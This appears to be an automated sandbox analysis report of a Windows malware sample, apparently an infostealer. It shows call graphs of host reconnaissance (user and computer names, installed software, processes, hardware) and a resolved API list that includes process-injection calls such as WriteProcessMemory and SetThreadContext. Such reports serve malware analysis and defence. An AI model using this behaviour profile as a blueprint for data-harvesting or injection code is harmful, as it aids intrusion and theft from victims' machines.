93850 41477b 93849->93850 93851 40f9a0 3 API calls 93850->93851 93852 414794 93851->93852 93853 40f8f0 lstrcpyA 93852->93853 93854 41479d 93853->93854 93855 40f9a0 3 API calls 93854->93855 93856 4147b6 93855->93856 93857 40f8f0 lstrcpyA 93856->93857 93858 4147bf 93857->93858 93859 40f9a0 3 API calls 93858->93859 93860 4147d8 93859->93860 93861 40f8f0 lstrcpyA 93860->93861 93862 4147e1 93861->93862 94612 4105a0 GetProcessHeap HeapAlloc 93862->94612 93864 4147ee 93865 40f9a0 3 API calls 93864->93865 93866 4147fb 93865->93866 93867 40f8f0 lstrcpyA 93866->93867 93868 414804 93867->93868 93869 40f9a0 3 API calls 93868->93869 93870 41481d 93869->93870 93871 40f8f0 lstrcpyA 93870->93871 93872 414826 93871->93872 93873 40f9a0 3 API calls 93872->93873 93874 41483f 93873->93874 93875 40f8f0 lstrcpyA 93874->93875 93876 414848 93875->93876 94619 410730 CoInitializeEx CoInitializeSecurity CoCreateInstance 93876->94619 93878 414859 93879 40f940 2 API calls 93878->93879 93880 414869 93879->93880 93881 40f8f0 lstrcpyA 93880->93881 93882 414872 93881->93882 93883 40f9a0 3 API calls 93882->93883 93884 414893 93883->93884 93885 40f8f0 lstrcpyA 93884->93885 93886 41489c 93885->93886 93887 40f9a0 3 API calls 93886->93887 93888 4148b5 93887->93888 93889 40f8f0 lstrcpyA 93888->93889 93890 4148be 93889->93890 94632 410900 CoInitializeEx CoInitializeSecurity CoCreateInstance 93890->94632 93892 4148cf 93893 40f940 2 API calls 93892->93893 93894 4148df 93893->93894 93895 40f8f0 lstrcpyA 93894->93895 93896 4148e8 93895->93896 93897 40f9a0 3 API calls 93896->93897 93898 414909 93897->93898 93899 40f8f0 lstrcpyA 93898->93899 93900 414912 93899->93900 93901 40f9a0 3 API calls 93900->93901 93902 41492b 93901->93902 93903 40f8f0 lstrcpyA 93902->93903 93904 414934 93903->93904 94645 40fb20 GetProcessHeap HeapAlloc GetComputerNameA 93904->94645 93907 40f9a0 3 API calls 93908 41494e 93907->93908 93909 40f8f0 lstrcpyA 93908->93909 93910 414957 93909->93910 93911 40f9a0 3 API calls 93910->93911 93912 414970 93911->93912 93913 40f8f0 lstrcpyA 93912->93913 93914 414979 93913->93914 93915 40f9a0 3 API calls 93914->93915 93916 414992 93915->93916 93917 40f8f0 lstrcpyA 93916->93917 93918 41499b 93917->93918 94647 40fae0 GetProcessHeap HeapAlloc GetUserNameA 93918->94647 93920 4149a8 93921 40f9a0 3 API calls 93920->93921 93922 4149b5 93921->93922 93923 40f8f0 lstrcpyA 93922->93923 93924 4149be 93923->93924 93925 40f9a0 3 API calls 93924->93925 93926 4149d7 93925->93926 93927 40f8f0 lstrcpyA 93926->93927 93928 4149e0 93927->93928 93929 40f9a0 3 API calls 93928->93929 93930 4149f9 93929->93930 93931 40f8f0 lstrcpyA 93930->93931 93932 414a02 93931->93932 94648 4102c0 7 API calls 93932->94648 93935 40f940 2 API calls 93936 414a23 93935->93936 93937 40f8f0 lstrcpyA 93936->93937 93938 414a2c 93937->93938 93939 40f9a0 3 API calls 93938->93939 93940 414a4d 93939->93940 93941 40f8f0 lstrcpyA 93940->93941 93942 414a56 93941->93942 93943 40f9a0 3 API calls 93942->93943 93944 414a6f 93943->93944 93945 40f8f0 lstrcpyA 93944->93945 93946 414a78 93945->93946 94651 40fc30 93946->94651 93949 40f940 2 API calls 93950 414a99 93949->93950 93951 40f8f0 lstrcpyA 93950->93951 93952 414aa2 93951->93952 93953 40f9a0 3 API calls 93952->93953 93954 414ac3 93953->93954 93955 40f8f0 lstrcpyA 93954->93955 93956 414acc 93955->93956 93957 40f9a0 3 API calls 93956->93957 93958 414ae5 93957->93958 93959 40f8f0 lstrcpyA 93958->93959 93960 414aee 93959->93960 94661 40fb60 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 93960->94661 93962 414afb 93963 40f9a0 3 API calls 93962->93963 93964 414b08 93963->93964 93965 40f8f0 lstrcpyA 93964->93965 93966 414b11 93965->93966 93967 40f9a0 3 API calls 93966->93967 93968 414b2a 93967->93968 93969 40f8f0 lstrcpyA 93968->93969 93970 414b33 93969->93970 93971 40f9a0 3 API calls 93970->93971 93972 414b4c 93971->93972 93973 40f8f0 lstrcpyA 93972->93973 93974 414b55 93973->93974 94662 40fbc0 GetProcessHeap HeapAlloc GetTimeZoneInformation 93974->94662 93977 40f9a0 3 API calls 93978 414b6f 93977->93978 93979 40f8f0 lstrcpyA 93978->93979 93980 414b78 93979->93980 93981 40f9a0 3 API calls 93980->93981 93982 414b91 93981->93982 93983 40f8f0 lstrcpyA 93982->93983 93984 414b9a 93983->93984 93985 40f9a0 3 API calls 93984->93985 93986 414bb3 93985->93986 93987 40f8f0 lstrcpyA 93986->93987 93988 414bbc 93987->93988 93989 40f9a0 3 API calls 93988->93989 93990 414bd5 93989->93990 93991 40f8f0 lstrcpyA 93990->93991 93992 414bde 93991->93992 94665 40fd30 GetProcessHeap HeapAlloc RegOpenKeyExA 93992->94665 93994 414beb 93995 40f9a0 3 API calls 93994->93995 93996 414bf8 93995->93996 93997 40f8f0 lstrcpyA 93996->93997 93998 414c01 93997->93998 93999 40f9a0 3 API calls 93998->93999 94000 414c1a 93999->94000 94001 40f8f0 lstrcpyA 94000->94001 94002 414c23 94001->94002 94003 40f9a0 3 API calls 94002->94003 94004 414c3c 94003->94004 94005 40f8f0 lstrcpyA 94004->94005 94006 414c45 94005->94006 94668 40fde0 GetLogicalProcessorInformationEx 94006->94668 94008 414c52 94009 40f9a0 3 API calls 94008->94009 94010 414c5f 94009->94010 94011 40f8f0 lstrcpyA 94010->94011 94012 414c68 94011->94012 94013 40f9a0 3 API calls 94012->94013 94014 414c81 94013->94014 94015 40f8f0 lstrcpyA 94014->94015 94016 414c8a 94015->94016 94017 40f9a0 3 API calls 94016->94017 94018 414ca3 94017->94018 94019 40f8f0 lstrcpyA 94018->94019 94020 414cac 94019->94020 94682 40fda0 GetSystemInfo wsprintfA 94020->94682 94022 414cb9 94023 40f9a0 3 API calls 94022->94023 94024 414cc6 94023->94024 94025 40f8f0 lstrcpyA 94024->94025 94026 414ccf 94025->94026 94027 40f9a0 3 API calls 94026->94027 94028 414ce8 94027->94028 94029 40f8f0 lstrcpyA 94028->94029 94030 414cf1 94029->94030 94031 40f9a0 3 API calls 94030->94031 94032 414d0a 94031->94032 94033 40f8f0 lstrcpyA 94032->94033 94034 414d13 94033->94034 94683 40fed0 GetProcessHeap HeapAlloc 94034->94683 94036 414d20 94037 40f9a0 3 API calls 94036->94037 94038 414d2d 94037->94038 94039 40f8f0 lstrcpyA 94038->94039 94040 414d36 94039->94040 94041 40f9a0 3 API calls 94040->94041 94042 414d4f 94041->94042 94043 40f8f0 lstrcpyA 94042->94043 94044 414d58 94043->94044 94045 40f9a0 3 API calls 94044->94045 94046 414d71 94045->94046 94047 40f8f0 lstrcpyA 94046->94047 94048 414d7a 94047->94048 94688 40ff40 94048->94688 94051 40f940 2 API calls 94052 414d9b 94051->94052 94053 40f8f0 lstrcpyA 94052->94053 94054 414da4 94053->94054 94055 40f9a0 3 API calls 94054->94055 94056 414dc5 94055->94056 94057 40f8f0 lstrcpyA 94056->94057 94058 414dce 94057->94058 94059 40f9a0 3 API calls 94058->94059 94060 414de7 94059->94060 94061 40f8f0 lstrcpyA 94060->94061 94062 414df0 94061->94062 94695 410200 94062->94695 94064 414e01 94065 40f940 2 API calls 94064->94065 94066 414e11 94065->94066 94067 40f8f0 lstrcpyA 94066->94067 94068 414e1a 94067->94068 94069 40f9a0 3 API calls 94068->94069 94070 414e3b 94069->94070 94071 40f8f0 lstrcpyA 94070->94071 94072 414e44 94071->94072 94073 40f9a0 3 API calls 94072->94073 94074 414e5d 94073->94074 94075 40f8f0 lstrcpyA 94074->94075 94076 414e66 94075->94076 94704 40ffc0 94076->94704 94078 414e7c 94079 40f940 2 API calls 94078->94079 94080 414e8c 94079->94080 94081 40f8f0 lstrcpyA 94080->94081 94082 414e95 94081->94082 94083 40ffc0 17 API calls 94082->94083 94084 414eb3 94083->94084 94085 40f940 2 API calls 94084->94085 94086 414ec3 94085->94086 94087 40f8f0 lstrcpyA 94086->94087 94088 414ecc 94087->94088 94089 40f9a0 3 API calls 94088->94089 94090 414eed 94089->94090 94091 40f8f0 lstrcpyA 94090->94091 94092 414ef6 94091->94092 94093 414f06 lstrlenA 94092->94093 94094 414f16 94093->94094 94095 40f810 lstrcpyA 94094->94095 94096 414f26 94095->94096 94097 401080 lstrcpyA 94096->94097 94098 414f34 94097->94098 94724 4142a0 94098->94724 94100 414f3d 94100->92440 94537 41b17e 94536->94537 94538 41b190 94537->94538 94555 419f80 lstrlenA lstrcpyA 94537->94555 94542 419fe0 94538->94542 94541 41b1a9 ctype 94541->93262 94543 41a123 94542->94543 94544 419ff2 94542->94544 94543->94541 94544->94543 94545 41a027 SetFilePointer 94544->94545 94546 41a058 94544->94546 94545->94541 94547 41a05d CreateFileA 94546->94547 94548 41a09e 94546->94548 94549 41a07d 94547->94549 94550 41a0d4 CreateFileMappingA 94548->94550 94551 41a0ab 94548->94551 94549->94541 94552 41a0e9 MapViewOfFile 94550->94552 94553 41a10c 94550->94553 94551->94541 94552->94551 94554 41a0ff CloseHandle 94552->94554 94553->94541 94554->94553 94555->94538 94556->93363 94557->93321 94558->93352 94559->93321 94560->93334 94561->93321 94563 40f810 lstrcpyA 94562->94563 94564 401f13 94563->94564 94564->93323 94565->93321 94566->93321 94567->93393 94569 403d80 94568->94569 94569->94569 94570 403d87 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 94569->94570 94579 40fa50 94570->94579 94572 403dd5 lstrlenA 94580 40fa50 94572->94580 94574 403de5 InternetCrackUrlA 94575 403e03 94574->94575 94575->93402 94576->93527 94578 40f898 94577->94578 94578->93451 94579->94572 94580->94574 94581->93537 94582->93715 94583->93717 94584->93719 94585->93721 94586->93725 94587->93727 94589 406d01 LocalAlloc 94588->94589 94590 406d3b 94588->94590 94589->94590 94591 406d12 CryptStringToBinaryA 94589->94591 94590->93579 94591->94590 94592 406d29 LocalFree 94591->94592 94592->93579 94593->93735 94594->93743 94595->93754 94596->93785 94598 4103aa RegCloseKey CharToOemA 94597->94598 94599 41038c RegQueryValueExA 94597->94599 94598->93799 94599->94598 94601 4103f8 94600->94601 94602 41040a 94600->94602 94603 40f810 lstrcpyA 94601->94603 94604 40f810 lstrcpyA 94602->94604 94605 410403 94603->94605 94606 410416 94604->94606 94605->93813 94606->93813 94608 4110b1 K32GetModuleFileNameExA CloseHandle 94607->94608 94609 4110cd 94607->94609 94608->94609 94610 40f810 lstrcpyA 94609->94610 94611 4110de 94610->94611 94611->93843 94742 40fa60 GetProcessHeap HeapAlloc RegOpenKeyExA 94612->94742 94614 4105c9 94615 4105d0 94614->94615 94616 4105da RegOpenKeyExA 94614->94616 94615->93864 94617 410612 RegCloseKey 94616->94617 94618 4105fb RegQueryValueExA 94616->94618 94617->93864 94618->94617 94620 4107a6 94619->94620 94621 4108c2 94620->94621 94622 4107ae CoSetProxyBlanket 94620->94622 94623 40f810 lstrcpyA 94621->94623 94625 4107e1 94622->94625 94624 4108d8 94623->94624 94624->93878 94625->94621 94626 410817 VariantInit 94625->94626 94627 410838 94626->94627 94746 410630 CoCreateInstance 94627->94746 94629 410847 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 94630 40f810 lstrcpyA 94629->94630 94631 4108a5 VariantClear 94630->94631 94631->93878 94633 410976 94632->94633 94634 41097e CoSetProxyBlanket 94633->94634 94637 410a34 94633->94637 94638 4109b1 94634->94638 94635 40f810 lstrcpyA 94636 410a4a 94635->94636 94636->93892 94637->94635 94638->94637 94639 4109df VariantInit 94638->94639 94640 410a00 94639->94640 94752 410cf0 LocalAlloc CharToOemW 94640->94752 94642 410a09 94643 40f810 lstrcpyA 94642->94643 94644 410a17 VariantClear 94643->94644 94644->93892 94646 40fb56 94645->94646 94646->93907 94647->93920 94649 40f810 lstrcpyA 94648->94649 94650 41032b 94649->94650 94650->93935 94652 40f810 lstrcpyA 94651->94652 94653 40fc49 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 94652->94653 94654 40fd11 94653->94654 94660 40fc7c 94653->94660 94656 40fd15 LocalFree 94654->94656 94657 40fd1c 94654->94657 94655 40fc80 GetLocaleInfoA 94655->94660 94656->94657 94657->93949 94658 40f9a0 lstrlenA lstrcpyA lstrcatA 94658->94660 94659 40f8f0 lstrcpyA 94659->94660 94660->94654 94660->94655 94660->94658 94660->94659 94661->93962 94663 40fbf2 wsprintfA 94662->94663 94664 40fc1b 94662->94664 94663->94664 94664->93977 94666 40fd75 RegQueryValueExA 94665->94666 94667 40fd8c RegCloseKey 94665->94667 94666->94667 94667->93994 94669 40fe0c 94668->94669 94673 40fe52 94668->94673 94670 40fe10 GetLastError 94669->94670 94680 40fe23 94669->94680 94670->94669 94672 40fea8 94670->94672 94675 40feb2 94672->94675 94756 410b20 GetProcessHeap HeapFree 94672->94756 94755 410b20 GetProcessHeap HeapFree 94673->94755 94674 40fe7b 94674->94675 94676 40fe85 wsprintfA 94674->94676 94675->94008 94676->94008 94680->94675 94681 40fe3e GetLogicalProcessorInformationEx 94680->94681 94753 410b20 GetProcessHeap HeapFree 94680->94753 94754 410b40 GetProcessHeap HeapAlloc 94680->94754 94681->94670 94681->94673 94682->94022 94757 410ad0 94683->94757 94686 40ff10 wsprintfA 94686->94036 94689 40f810 lstrcpyA 94688->94689 94690 40ff5a EnumDisplayDevicesA 94689->94690 94691 40ffb3 94690->94691 94692 40ff7b 94690->94692 94691->94051 94692->94691 94693 40f8a0 2 API calls 94692->94693 94694 40ff92 EnumDisplayDevicesA 94692->94694 94693->94692 94694->94691 94694->94692 94696 40f810 lstrcpyA 94695->94696 94697 41021a CreateToolhelp32Snapshot Process32First 94696->94697 94698 410242 Process32Next 94697->94698 94699 4102a8 CloseHandle 94697->94699 94698->94699 94702 410254 94698->94702 94699->94064 94700 40f9a0 lstrlenA lstrcpyA lstrcatA 94700->94702 94701 40f8f0 lstrcpyA 94701->94702 94702->94700 94702->94701 94703 410296 Process32Next 94702->94703 94703->94699 94703->94702 94705 40f810 lstrcpyA 94704->94705 94706 40ffd7 RegOpenKeyExA 94705->94706 94707 410013 94706->94707 94723 410030 94706->94723 94708 40f850 lstrcpyA 94707->94708 94710 410021 94708->94710 94709 410033 RegEnumKeyExA 94711 410062 wsprintfA RegOpenKeyExA 94709->94711 94709->94723 94710->94078 94713 4101e1 RegCloseKey RegCloseKey 94711->94713 94714 4100a8 RegQueryValueExA 94711->94714 94712 4101b9 RegCloseKey 94715 4101c7 94712->94715 94713->94715 94716 4101a6 RegCloseKey 94714->94716 94717 4100d8 lstrlenA 94714->94717 94718 40f850 lstrcpyA 94715->94718 94716->94723 94717->94716 94717->94723 94719 4101d1 94718->94719 94719->94078 94720 40f9a0 lstrlenA lstrcpyA lstrcatA 94720->94723 94721 410134 RegQueryValueExA 94721->94716 94721->94723 94722 40f8f0 lstrcpyA 94722->94723 94723->94709 94723->94712 94723->94716 94723->94720 94723->94721 94723->94722 94725 4142ae 94724->94725 94726 40f8f0 lstrcpyA 94725->94726 94727 4142eb 94726->94727 94728 40f8f0 lstrcpyA 94727->94728 94729 414317 94728->94729 94730 40f8f0 lstrcpyA 94729->94730 94731 414323 94730->94731 94732 40f8f0 lstrcpyA 94731->94732 94733 41432f 94732->94733 94734 414338 94733->94734 94738 414354 94733->94738 94735 414340 Sleep 94734->94735 94735->94735 94735->94738 94736 41437c CreateThread WaitForSingleObject 94737 40f810 lstrcpyA 94736->94737 94841 4130f0 94736->94841 94741 4143ae 94737->94741 94738->94736 94759 41c570 94738->94759 94740 414379 94740->94736 94741->94100 94743 40faa5 RegQueryValueExA 94742->94743 94744 40fabb RegCloseKey 94742->94744 94743->94744 94745 40facb 94744->94745 94745->94614 94747 410677 SysAllocString 94746->94747 94748 4106e6 94746->94748 94747->94748 94750 410687 94747->94750 94748->94629 94749 4106df SysFreeString 94749->94748 94750->94749 94751 4106b6 _wtoi64 SysFreeString 94750->94751 94751->94749 94752->94642 94753->94680 94754->94680 94755->94674 94756->94675 94758 40fefa GlobalMemoryStatusEx 94757->94758 94758->94686 94760 41c586 94759->94760 94761 41c57a 94759->94761 94762 41c58b 94760->94762 94765 41bd50 94760->94765 94761->94740 94762->94740 94764 41c5ad 94764->94740 94766 41bd67 94765->94766 94769 41bd74 94765->94769 94766->94764 94767 41bd79 94767->94764 94768 41bd9d lstrcpyA 94770 41c085 94768->94770 94771 41bdba 94768->94771 94769->94767 94769->94768 94770->94764 94772 41be14 94771->94772 94828 419c90 9 API calls 94771->94828 94774 41be33 94772->94774 94775 41be26 94772->94775 94777 41be49 94774->94777 94778 41be38 94774->94778 94829 41afe0 15 API calls 94775->94829 94781 41be5f 94777->94781 94781->94770 94828->94772 94850 40fa50 94841->94850 94843 41311f lstrlenA 94847 41313a 94843->94847 94849 41312f 94843->94849 94844 40f850 lstrcpyA 94844->94847 94845 4045d0 44 API calls 94845->94847 94846 40f8f0 lstrcpyA 94846->94847 94847->94844 94847->94845 94847->94846 94848 4131cc StrCmpCA 94847->94848 94848->94847 94848->94849 94850->94843 96308 6c563060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 96313 6c59ab2a 96308->96313 96312 6c5630db 96317 6c59ae0c _crt_atexit _register_onexit_function 96313->96317 96315 6c5630cd 96316 6c59b320 5 API calls ___raise_securityfailure 96315->96316 96316->96312 96317->96315 96318 6c5635a0 96319 6c5635c4 InitializeCriticalSectionAndSpinCount getenv 96318->96319 96334 6c563846 __aulldiv 96318->96334 96321 6c5638fc strcmp 96319->96321 96331 6c5635f3 __aulldiv 96319->96331 96323 6c563912 strcmp 96321->96323 96321->96331 96322 6c5638f4 96323->96331 96324 6c5635f8 QueryPerformanceFrequency 96324->96331 96325 6c563622 _strnicmp 96326 6c563944 _strnicmp 96325->96326 96325->96331 96329 6c56395d 96326->96329 96326->96331 96327 6c56376a QueryPerformanceCounter EnterCriticalSection 96330 6c5637b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 96327->96330 96333 6c56375c 96327->96333 96328 6c563664 GetSystemTimeAdjustment 96328->96331 96332 6c5637fc LeaveCriticalSection 96330->96332 96330->96333 96331->96324 96331->96325 96331->96326 96331->96328 96331->96329 96331->96333 96332->96333 96332->96334 96333->96327 96333->96330 96333->96332 96333->96334 96335 6c59b320 5 API calls ___raise_securityfailure 96334->96335 96335->96322 96336 6c57c930 GetSystemInfo VirtualAlloc 96337 6c57c9a3 GetSystemInfo 96336->96337 96343 6c57c973 96336->96343 96339 6c57c9b6 96337->96339 96340 6c57c9d0 96337->96340 96339->96340 96342 6c57c9bd 96339->96342 96340->96343 96344 6c57c9d8 VirtualAlloc 96340->96344 96341 6c57c99b 96342->96343 96347 6c57c9c1 VirtualFree 96342->96347 96352 6c59b320 5 API calls ___raise_securityfailure 96343->96352 96345 6c57c9f0 96344->96345 96346 6c57c9ec 96344->96346 96353 6c59cbe8 GetCurrentProcess TerminateProcess 96345->96353 96346->96343 96347->96343 96352->96341 96354 6c59b8ae 96356 6c59b8ba ___scrt_is_nonwritable_in_current_image 96354->96356 96355 6c59b8c9 96356->96355 96357 6c59b8e3 dllmain_raw 96356->96357 96358 6c59b8de 96356->96358 96357->96355 96359 6c59b8fd dllmain_crt_dispatch 96357->96359 96367 6c57bed0 DisableThreadLibraryCalls LoadLibraryExW 96358->96367 96359->96355 96359->96358 96361 6c59b91e 96362 6c59b94a 96361->96362 96368 6c57bed0 DisableThreadLibraryCalls LoadLibraryExW 96361->96368 96362->96355 96363 6c59b953 dllmain_crt_dispatch 96362->96363 96363->96355 96365 6c59b966 dllmain_raw 96363->96365 96365->96355 96366 6c59b936 dllmain_crt_dispatch dllmain_raw 96366->96362 96367->96361 96368->96366 96369 6c59b9c0 96370 6c59b9c9 96369->96370 96371 6c59b9ce dllmain_dispatch 96369->96371 96373 6c59bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 96370->96373 96373->96371 96374 6c59b694 96375 6c59b6a0 ___scrt_is_nonwritable_in_current_image 96374->96375 96404 6c59af2a 96375->96404 96377 6c59b6a7 96378 6c59b6d1 96377->96378 96379 6c59b796 96377->96379 96386 6c59b6ac ___scrt_is_nonwritable_in_current_image 96377->96386 96408 6c59b064 96378->96408 96421 6c59b1f7 IsProcessorFeaturePresent 96379->96421 96382 6c59b6e0 __RTC_Initialize 96382->96386 96411 6c59bf89 InitializeSListHead 96382->96411 96384 6c59b6ee ___scrt_initialize_default_local_stdio_options 96389 6c59b6f3 _initterm_e 96384->96389 96385 6c59b79d ___scrt_is_nonwritable_in_current_image 96387 6c59b828 96385->96387 96388 6c59b7d2 96385->96388 96402 6c59b7b3 ___scrt_uninitialize_crt __RTC_Initialize 96385->96402 96390 6c59b1f7 ___scrt_fastfail 6 API calls 96387->96390 96425 6c59b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 96388->96425 96389->96386 96392 6c59b708 96389->96392 96394 6c59b82f 96390->96394 96412 6c59b072 96392->96412 96399 6c59b83b 96394->96399 96400 6c59b86e dllmain_crt_process_detach 96394->96400 96395 6c59b7d7 96426 6c59bf95 __std_type_info_destroy_list 96395->96426 96396 6c59b70d 96396->96386 96398 6c59b711 _initterm 96396->96398 96398->96386 96401 6c59b860 dllmain_crt_process_attach 96399->96401 96403 6c59b840 96399->96403 96400->96403 96401->96403 96405 6c59af33 96404->96405 96427 6c59b341 IsProcessorFeaturePresent 96405->96427 96407 6c59af3f ___scrt_uninitialize_crt 96407->96377 96428 6c59af8b 96408->96428 96410 6c59b06b 96410->96382 96411->96384 96413 6c59b077 ___scrt_release_startup_lock 96412->96413 96414 6c59b07b 96413->96414 96416 6c59b082 96413->96416 96438 6c59b341 IsProcessorFeaturePresent 96414->96438 96418 6c59b087 _configure_narrow_argv 96416->96418 96417 6c59b080 96417->96396 96419 6c59b092 96418->96419 96420 6c59b095 _initialize_narrow_environment 96418->96420 96419->96396 96420->96417 96422 6c59b20c ___scrt_fastfail 96421->96422 96423 6c59b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 96422->96423 96424 6c59b302 ___scrt_fastfail 96423->96424 96424->96385 96425->96395 96426->96402 96427->96407 96429 6c59af9a 96428->96429 96430 6c59af9e 96428->96430 96429->96410 96431 6c59afab ___scrt_release_startup_lock 96430->96431 96432 6c59b028 96430->96432 96435 6c59afb8 _initialize_onexit_table 96431->96435 96437 6c59afd6 96431->96437 96433 6c59b1f7 ___scrt_fastfail 6 API calls 96432->96433 96434 6c59b02f 96433->96434 96436 6c59afc7 _initialize_onexit_table 96435->96436 96435->96437 96436->96437 96437->96410 96438->96417

                                                                                        Executed Functions

                                                                                        Function 00417A40 Relevance: 231.7, APIs: 121, Strings: 11, Instructions: 726libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 555 417a40-417a47 556 417efd-417fa1 LoadLibraryA * 9 555->556 557 417a4d-417ef8 GetProcAddress * 50 555->557 558 417fa3-418012 GetProcAddress * 5 556->558 559 418017-41801e 556->559 557->556 558->559 560 4180e1-4180e8 559->560 561 418024-4180dc GetProcAddress * 8 559->561 562 4180ea-418159 GetProcAddress * 5 560->562 563 41815e-418165 560->563 561->560 562->563 564 4181f7-4181fe 563->564 565 41816b-4181f2 GetProcAddress * 6 563->565 566 418204-4182d5 GetProcAddress * 9 564->566 567 4182da-4182e1 564->567 565->564 566->567 568 4182e3-418352 GetProcAddress * 5 567->568 569 418357-41835e 567->569 568->569 570 418360-418386 GetProcAddress * 2 569->570 571 41838b-418392 569->571 570->571 572 418394-4183ba GetProcAddress * 2 571->572 573 4183bf-4183c6 571->573 572->573 574 4184b7-4184be 573->574 575 4183cc-4184b2 GetProcAddress * 10 573->575 576 4184c0-418517 GetProcAddress * 4 574->576 577 41851c-418523 574->577 575->574 576->577 578 418525-418533 GetProcAddress 577->578 579 418538-41853f 577->579 578->579 580 418541-418598 GetProcAddress * 4 579->580 581 41859d-4185a4 579->581 580->581 582 4185b7 581->582 583 4185a6-4185b2 GetProcAddress 581->583 583->582
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696670), ref: 00417A55
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016966B0), ref: 00417A6D
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016979A0), ref: 00417A86
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697940), ref: 00417A9E
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697958), ref: 00417AB6
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016976A0), ref: 00417ACF
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01690FC8), ref: 00417AE7
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016976D0), ref: 00417AFF
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016978B0), ref: 00417B18
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697760), ref: 00417B30
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016976B8), ref: 00417B48
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016966D0), ref: 00417B61
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696530), ref: 00417B79
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696550), ref: 00417B91
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696710), ref: 00417BAA
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697928), ref: 00417BC2
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697850), ref: 00417BDA
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01690ED8), ref: 00417BF3
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696370), ref: 00417C0B
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697820), ref: 00417C23
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697868), ref: 00417C3C
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697658), ref: 00417C54
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016976E8), ref: 00417C6C
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016964B0), ref: 00417C85
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697640), ref: 00417C9D
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697838), ref: 00417CB5
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016978C8), ref: 00417CCE
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697880), ref: 00417CE6
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016978E0), ref: 00417CFE
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697898), ref: 00417D17
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697778), ref: 00417D2F
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697730), ref: 00417D47
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016978F8), ref: 00417D60
                                                                                        • GetProcAddress.KERNEL32(74DD0000,0168FEA0), ref: 00417D78
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697808), ref: 00417D90
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016977F0), ref: 00417DA9
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016963B0), ref: 00417DC1
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697670), ref: 00417DD9
                                                                                        • GetProcAddress.KERNEL32(74DD0000,016966F0), ref: 00417DF2
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697910), ref: 00417E0A
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01697688), ref: 00417E22
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696570), ref: 00417E3B
                                                                                        • GetProcAddress.KERNEL32(74DD0000,01696590), ref: 00417E53
                                                                                        • GetProcAddress.KERNEL32(74DD0000,CreateProcessA), ref: 00417E6A
                                                                                        • GetProcAddress.KERNEL32(74DD0000,GetThreadContext), ref: 00417E80
                                                                                        • GetProcAddress.KERNEL32(74DD0000,ReadProcessMemory), ref: 00417E97
                                                                                        • GetProcAddress.KERNEL32(74DD0000,VirtualAllocEx), ref: 00417EAE
                                                                                        • GetProcAddress.KERNEL32(74DD0000,ResumeThread), ref: 00417EC4
                                                                                        • GetProcAddress.KERNEL32(74DD0000,WriteProcessMemory), ref: 00417EDB
                                                                                        • GetProcAddress.KERNEL32(74DD0000,SetThreadContext), ref: 00417EF2
                                                                                        • LoadLibraryA.KERNEL32(016977D8,004166E1), ref: 00417F03
                                                                                        • LoadLibraryA.KERNEL32(016977C0), ref: 00417F15
                                                                                        • LoadLibraryA.KERNEL32(01697700), ref: 00417F27
                                                                                        • LoadLibraryA.KERNEL32(01697718), ref: 00417F38
                                                                                        • LoadLibraryA.KERNEL32(01697790), ref: 00417F4A
                                                                                        • LoadLibraryA.KERNEL32(01697748), ref: 00417F5C
                                                                                        • LoadLibraryA.KERNEL32(016977A8), ref: 00417F6D
                                                                                        • LoadLibraryA.KERNEL32(01699878), ref: 00417F7F
                                                                                        • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417F8F
                                                                                        • GetProcAddress.KERNEL32(75290000,01696730), ref: 00417FAB
                                                                                        • GetProcAddress.KERNEL32(75290000,01699818), ref: 00417FC3
                                                                                        • GetProcAddress.KERNEL32(75290000,0168EF78), ref: 00417FDB
                                                                                        • GetProcAddress.KERNEL32(75290000,01699830), ref: 00417FF4
